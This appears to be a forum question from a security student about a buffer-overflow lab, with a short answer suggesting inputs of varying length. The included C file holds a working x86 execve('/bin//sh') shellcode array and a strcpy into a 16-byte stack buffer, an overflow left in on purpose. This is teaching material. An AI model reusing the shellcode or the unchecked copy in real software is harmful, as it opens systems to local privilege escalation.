I’ve been given a C code file where given the right input a buffer overflow occurs and then root access is granted. This is a Fedora bug using ZShell. In order to test this (security subject) we disabled the random memory address assignment that is enabled in the Linux kernel.
I’m asked to test different inputs until a segmention fault happens, where the input is the buffer size. What I don’t get is, why should I test with different values? I’m not sure the code will help but I just dont get the point of varying the input.
/* vulnerable.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char buf[] =
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/* -------------------------------------------------- */
void vuln(char * buf)
{
char a[16] = { 0 };
strcpy(a, buf);
}
int main(int argc, char * argv[])
{
int *ret;
if (argc != 2)
{
printf("Usage: %s <input>\n", argv[0]);
exit(1);
}
vuln(argv[1]);
printf("%p\n", buf);
return 0;
}
The buffer overflow will only occur given specific input, so you should try different inputs to see what will cause the problem to occur.
Hint: Buffer overflows happen when user input is longer than the program expected, so you should try with different lengths of input until the program starts crashing or doing unexpected things.